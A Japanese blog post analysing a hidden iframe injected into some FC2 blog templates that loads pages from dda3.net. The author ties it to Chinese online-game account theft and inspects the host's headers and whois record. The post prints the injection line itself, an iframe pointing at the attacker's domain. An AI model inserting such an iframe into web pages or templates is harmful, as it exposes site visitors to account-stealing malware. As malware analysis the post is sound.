忍者ブログ

ハルファ紀行

dda3.netその1

いくつかのFC2ブログのテンプレートにiframe(インラインフレーム)が仕掛けられていたそうです。
<iframe src="http://www.dda3.net/"></iframe>
実際には大きさ0(width="0" height="0")の指定もあります(ブラウザで表示されない)が省略します。

いつものオンラインゲームの中国製アカウントハックです。
iframeで以下の2つのフレームを呼び出します。
http://www.dda3.net/index.htm
http://www.dda3.net/he.htm
indexがindexを呼んで再帰に陥っているように見えますが、ディレクトリにアクセスした場合にどのファイルを表示するか(あるいはファイル一覧を表示するか403を返すか)はWebサーバ(ApacheやIISなど)の設定次第です。
HTTPヘッダによると
Content-Location:http://www.dda3.net/Default.htm
となっていて、Default.htmがindex.htmとhe.htmを呼び出しています。
そもそもDefault.htmはMicrosoftのIIS(Windowsに付属)のデフォルトとなっています。
HTTPヘッダによると
Server:Microsoft-IIS/6.0
とWindowsServer2003をお使いのようです。

ちなみにwhoisすると
Creation Date:2008-02-26
Country:China
となっており、このアカウントハックのためだけに登録したドメインのようです。
ドメインの登録は無料ではありませんが、RMTのためのささやかな投資です。
根本的な原因はRMTです。

続きます。

メモ:
HTTPヘッダ ブラウザもHTTPヘッダで通信しているぞ! Googleで調べてみよう!
whois ドメインの情報を調べることができるぞ! Googleで(略)
PR

コメント

カレンダー

04 2024/05 06
S M T W T F S
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

フリーエリア

最新コメント

[09/14 ヨシノ]
[10/19 Dolly]
[08/22 まとめ臨時。]

最新記事

(04/17)
PDF
(04/14)
PDF
(04/03)
PDF
(03/29)
PDF
(03/21)

最新トラックバック

プロフィール

HN:
Ilion
性別:
非公開

バーコード

ブログ内検索